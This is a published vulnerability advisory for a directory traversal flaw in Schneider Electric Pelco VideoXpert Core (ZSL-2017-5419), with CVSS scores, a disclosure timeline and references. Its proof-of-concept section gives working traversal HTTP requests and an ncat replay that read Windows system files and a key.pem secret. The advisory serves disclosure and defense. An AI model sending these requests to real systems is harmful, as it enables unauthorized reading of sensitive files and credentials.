Gjoko KrsticZSL-2017-5419Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
5.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
6.2 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
40.1%
Title: Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
Advisory ID: ZSL-2017-5419
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (4/5)
Release Date: 10.07.2017
Summary
VideoXpert is a video management solution designed for scalability, fitting the needs surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface.
Description
Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
Vendor
Schneider Electric SE - <https://www.pelco.com>
Affected Version
2.0.41
1.14.7
1.12.105
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Vendor Status
[05.04.2017] Vulnerabilities discovered.
[28.04.2017] Vendor contacted.
[09.07.2017] No response from the vendor.
[10.07.2017] Public security advisory released.
[05.12.2017] Vendor releases version 2.1 to address this issue.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://www.exploit-db.com/exploits/42311/>
[2] <https://cxsecurity.com/issue/WLB-2017070077>
[3] <https://packetstormsecurity.com/files/143317>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/129663>
[5] <https://www.schneider-electric.com/b2b/en/support/cybersecurity/security-notifications.jsp>
[6] <https://www.schneider-electric.com/en/download/document/SEVD-2017-339-01/>
[7] SEVD-2017-339-01- Pelco VideoXpert Enterprise (.pdf)
[8] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9965>
[9] <https://ics-cert.us-cert.gov/advisories/ICSA-17-355-02>
[10] <https://www.securityfocus.com/bid/102338>
[11] <http://securityaffairs.co/wordpress/67108/hacking/pelco-videoxpert-flaws.html>
[12] <https://www.cybersecurity-help.cz/vdb/SB2017122204>
[13] <https://nvd.nist.gov/vuln/detail/CVE-2017-9965>
[14] <http://www.isssource.com/schneider-clears-pelco-vulnerabilities/>
[15] <http://www.securityweek.com/schneider-electric-patches-flaws-pelco-video-management-system>
Changelog
[10.07.2017] - Initial release
[01.08.2017] - Added reference [1], [2] and [3]
[07.08.2017] - Added reference [4]
[05.12.2017] - Added vendor status
[13.12.2017] - Added reference [5], [6], [7] and [8]
[13.01.2018] - Added reference [9], [10], [11], [12], [13], [14] and [15]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
1.14.7
1.12.105
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
Exploiting this issue will allow an unauthenticated attacker to
view arbitrary files within the context of the web server.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Jetty(9.2.6.v20141205)
MongoDB/3.2.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
05.04.2017
--
PoC:
----
GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
------
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close
T0ps3cret
------
bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$
</p></body></html>Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
5.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
6.2 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
40.1%